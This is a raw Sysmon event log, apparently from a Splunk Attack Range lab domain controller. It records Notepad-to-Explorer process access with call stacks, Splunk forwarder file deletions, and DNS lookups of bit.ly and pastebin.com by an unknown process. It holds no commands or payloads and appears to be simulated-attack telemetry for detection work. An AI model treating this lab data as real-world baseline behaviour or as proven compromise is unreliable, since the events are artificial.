24d26|C:\Windows\system32\DUI70.dll+24e40|C:\Windows\system32\DUI70.dll+24e40 10341000x80000000000000002203407Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.893{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764 10341000x80000000000000002203406Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.893{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e|C:\Windows\System32\SHELL32.dll+13c386|C:\Windows\System32\SHELL32.dll+13be03|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000002203405Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.893{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e|C:\Windows\System32\SHELL32.dll+13c386|C:\Windows\System32\SHELL32.dll+13be03|C:\Windows\System32\SHELL32.dll+13ba1b 10341000x80000000000000002203404Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.893{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f 10341000x80000000000000002203403Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.893{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+d1aa1|C:\Windows\System32\windows.storage.dll+d3416|C:\Windows\System32\windows.storage.dll+d3c91|C:\Windows\system32\explorerframe.dll+7761f|C:\Windows\system32\explorerframe.dll+77b28|C:\Windows\system32\explorerframe.dll+4e34a|C:\Windows\system32\explorerframe.dll+4ff93|C:\Windows\system32\explorerframe.dll+477b7|C:\Windows\System32\SHELL32.dll+bca1c|C:\Windows\System32\SHELL32.dll+bc565|C:\Windows\System32\SHELL32.dll+bd07d|C:\Windows\System32\SHELL32.dll+c069f|C:\Windows\System32\SHELL32.dll+13c76e 23542300x80000000000000002203402Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.877{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=9AEB4ACA481714539E978CD8840456BF,SHA256=D44E3FDAD327B9989DAAC80839FC6DEED5D88F26A76E5DEB6266971A054153AE,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203401Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002203400Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\windows.storage.dll+da74e|C:\Windows\System32\windows.storage.dll+dab86|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb|C:\Windows\System32\shcore.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000002203399Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002203398Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002203397Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2) 10341000x80000000000000002203396Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03) 10341000x80000000000000002203395Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da865|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002203394Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\windows.storage.dll+da7e1|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+1164|C:\Windows\System32\USER32.dll+24d56|C:\Windows\System32\windows.storage.dll+1aa7fb 10341000x80000000000000002203393Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2) 10341000x80000000000000002203392Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.862{5ABCFE62-E9C0-6040-494E-00000000AD01}46046804C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\windows.storage.dll+da7c5|C:\Windows\System32\windows.storage.dll+da983|C:\Windows\System32\windows.storage.dll+dae18|C:\Windows\System32\windows.storage.dll+db1cb|C:\Windows\System32\windows.storage.dll+1460ed|C:\Windows\System32\windows.storage.dll+1a3e08|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4AF7)|UNKNOWN(FFFFF5A6522AF181)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522AFAA2)|UNKNOWN(FFFFF8037B5EFE03) 10341000x80000000000000002203391Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.705{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+5d48a|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4B82) 10341000x80000000000000002203390Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.705{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978) 10341000x80000000000000002203389Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.705{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+5d478|C:\Windows\System32\SHELL32.dll+d2c54|C:\Windows\System32\SHELL32.dll+d04fb|C:\Windows\System32\SHELL32.dll+cffdd|C:\Windows\System32\SHELL32.dll+41a89|C:\Windows\System32\COMDLG32.dll+13ab9|C:\Windows\SYSTEM32\Notepad.exe+1988|C:\Windows\SYSTEM32\Notepad.exe+1c5f|C:\Windows\SYSTEM32\Notepad.exe+247a|C:\Windows\SYSTEM32\Notepad.exe+3a72|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522B4B82) 23542300x80000000000000002203388Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.627{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3849B78FAA55BA92AF94CC14675C8C9D,SHA256=0A886E420835D2912A5D9843300CF9B7191BCF979C0C99F6C64D7CD385242623,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002203387Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D81979BCD4A5D924D6306DBE0A899D1,SHA256=ED300821959CD704ABBA955769D07F004FE42C8FC89DD55009C1D8E003E8B829,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203386Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.687{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local54590- 354300x80000000000000002203385Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.572{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-61624- 354300x80000000000000002203384Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.572{5ABCFE62-842F-603E-1500-00000000AD01}1104C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue7f00:1:0:0:98c0:a3ad:1e2:ffff-61624-true7f00:1:0:0:0:0:0:0-53domain 22542200x80000000000000002203383Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.795{00000000-0000-0000-0000-000000000000}5828pastebin.com0::ffff:104.23.99.190;::ffff:104.23.98.190;<unknown process> 22542200x80000000000000002203382Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.703{00000000-0000-0000-0000-000000000000}5828bit.ly0::ffff:67.199.248.11;::ffff:67.199.248.10;<unknown process> 23542300x80000000000000002203381Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:00.112{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4063A593ED05381121E6B48E0288B66E,SHA256=90D0E90BC99AFFAC3CB4A1B3AA83E3299519B20EE287E2C02627C7724865AAD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203380Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 